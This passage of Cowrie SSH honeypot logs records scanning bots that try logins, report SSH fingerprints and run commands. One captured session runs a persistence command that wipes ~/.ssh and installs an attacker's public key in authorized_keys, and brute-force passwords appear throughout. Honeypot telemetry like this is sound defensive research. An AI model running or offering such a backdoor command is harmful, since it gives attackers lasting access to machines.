acCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:24:42.064387Z","src_ip":"45.125.211.194","session":"9b3ccca22e58"}
{"eventid":"cowrie.login.success","username":"root","password":"4e2q1w3r","message":"login attempt [root/4e2q1w3r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:24:42.898742Z","src_ip":"45.125.211.194","session":"9b3ccca22e58"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:24:43.411160Z","src_ip":"45.125.211.194","session":"9b3ccca22e58"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:24:43.411875Z","src_ip":"45.125.211.194","session":"9b3ccca22e58"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:43.634319Z","src_ip":"45.125.211.194","session":"9b3ccca22e58"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:43.635582Z","src_ip":"45.125.211.194","session":"9b3ccca22e58"}
{"eventid":"cowrie.session.connect","src_ip":"103.145.145.75","src_port":58952,"dst_ip":"1.2.3.4","dst_port":22,"session":"49f4ab48bfd7","protocol":"ssh","message":"New connection: 103.145.145.75:58952 (1.2.3.4:22) [session: 49f4ab48bfd7]","sensor":"my-vps","timestamp":"2025-08-28T03:24:55.700603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T03:24:55.701554Z","src_ip":"103.145.145.75","session":"49f4ab48bfd7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T03:24:55.895534Z","src_ip":"103.145.145.75","session":"49f4ab48bfd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38580,"dst_ip":"1.2.3.4","dst_port":22,"session":"da7baf09b65a","protocol":"ssh","message":"New connection: 212.227.125.160:38580 (1.2.3.4:22) [session: da7baf09b65a]","sensor":"my-vps","timestamp":"2025-08-28T03:24:56.142944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:24:56.143590Z","src_ip":"212.227.125.160","session":"da7baf09b65a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:24:56.362188Z","src_ip":"212.227.125.160","session":"da7baf09b65a"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":44024,"dst_ip":"1.2.3.4","dst_port":22,"session":"87aa2ac18716","protocol":"ssh","message":"New connection: 45.125.211.194:44024 (1.2.3.4:22) [session: 87aa2ac18716]","sensor":"my-vps","timestamp":"2025-08-28T03:24:56.526829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:24:56.543930Z","src_ip":"45.125.211.194","session":"87aa2ac18716"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w#E4r","message":"login attempt [root/!Q2w#E4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:24:56.723249Z","src_ip":"103.145.145.75","session":"49f4ab48bfd7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:24:56.740695Z","src_ip":"45.125.211.194","session":"87aa2ac18716"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T03:24:57.019215Z","src_ip":"212.227.125.160","session":"da7baf09b65a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:24:57.141298Z","src_ip":"103.145.145.75","session":"49f4ab48bfd7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:24:57.142171Z","src_ip":"103.145.145.75","session":"49f4ab48bfd7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:24:57.143198Z","src_ip":"103.145.145.75","session":"49f4ab48bfd7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:57.339010Z","src_ip":"103.145.145.75","session":"49f4ab48bfd7"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:24:57.572957Z","src_ip":"45.125.211.194","session":"87aa2ac18716"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:24:57.874945Z","src_ip":"103.145.145.75","session":"49f4ab48bfd7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T03:24:57.875690Z","src_ip":"103.145.145.75","session":"49f4ab48bfd7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T03:24:58.077013Z","src_ip":"103.145.145.75","session":"49f4ab48bfd7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:58.078051Z","src_ip":"103.145.145.75","session":"49f4ab48bfd7"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:58.239435Z","src_ip":"212.227.125.160","session":"da7baf09b65a"}
{"eventid":"cowrie.session.connect","src_ip":"103.145.145.75","src_port":59544,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f2b72c78ec0","protocol":"ssh","message":"New connection: 103.145.145.75:59544 (1.2.3.4:22) [session: 0f2b72c78ec0]","sensor":"my-vps","timestamp":"2025-08-28T03:24:58.272843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T03:24:58.274091Z","src_ip":"103.145.145.75","session":"0f2b72c78ec0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T03:24:58.472949Z","src_ip":"103.145.145.75","session":"0f2b72c78ec0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:58.783794Z","src_ip":"45.125.211.194","session":"87aa2ac18716"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49464,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bae4dc7e2ae","protocol":"ssh","message":"New connection: 212.227.235.229:49464 (1.2.3.4:22) [session: 5bae4dc7e2ae]","sensor":"my-vps","timestamp":"2025-08-28T03:24:58.937733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:24:58.938924Z","src_ip":"212.227.235.229","session":"5bae4dc7e2ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:24:59.183285Z","src_ip":"212.227.235.229","session":"5bae4dc7e2ae"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T03:24:59.260182Z","src_ip":"103.145.145.75","session":"0f2b72c78ec0"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T03:24:59.915029Z","src_ip":"212.227.235.229","session":"5bae4dc7e2ae"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:00.464667Z","src_ip":"103.145.145.75","session":"0f2b72c78ec0"}
{"eventid":"cowrie.session.connect","src_ip":"103.145.145.75","src_port":60092,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9d6c60db1f6","protocol":"ssh","message":"New connection: 103.145.145.75:60092 (1.2.3.4:22) [session: d9d6c60db1f6]","sensor":"my-vps","timestamp":"2025-08-28T03:25:00.653913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T03:25:00.662234Z","src_ip":"103.145.145.75","session":"d9d6c60db1f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T03:25:00.853603Z","src_ip":"103.145.145.75","session":"d9d6c60db1f6"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:01.159420Z","src_ip":"212.227.235.229","session":"5bae4dc7e2ae"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:25:01.627596Z","src_ip":"103.145.145.75","session":"d9d6c60db1f6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:01.826803Z","src_ip":"103.145.145.75","session":"d9d6c60db1f6"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:01.828732Z","src_ip":"103.145.145.75","session":"49f4ab48bfd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59460,"dst_ip":"1.2.3.4","dst_port":22,"session":"c07d0d1effc6","protocol":"ssh","message":"New connection: 212.227.125.160:59460 (1.2.3.4:22) [session: c07d0d1effc6]","sensor":"my-vps","timestamp":"2025-08-28T03:25:08.467256Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:08.470479Z","src_ip":"212.227.125.160","session":"c07d0d1effc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42112,"dst_ip":"1.2.3.4","dst_port":22,"session":"cae7d287dbd2","protocol":"ssh","message":"New connection: 212.227.235.229:42112 (1.2.3.4:22) [session: cae7d287dbd2]","sensor":"my-vps","timestamp":"2025-08-28T03:25:11.362106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:25:11.367651Z","src_ip":"212.227.235.229","session":"cae7d287dbd2"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":31529,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff8da7dc0ad8","protocol":"ssh","message":"New connection: 45.125.211.194:31529 (1.2.3.4:22) [session: ff8da7dc0ad8]","sensor":"my-vps","timestamp":"2025-08-28T03:25:11.386143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:25:11.407209Z","src_ip":"45.125.211.194","session":"ff8da7dc0ad8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:25:11.600821Z","src_ip":"45.125.211.194","session":"ff8da7dc0ad8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:25:11.612925Z","src_ip":"212.227.235.229","session":"cae7d287dbd2"}
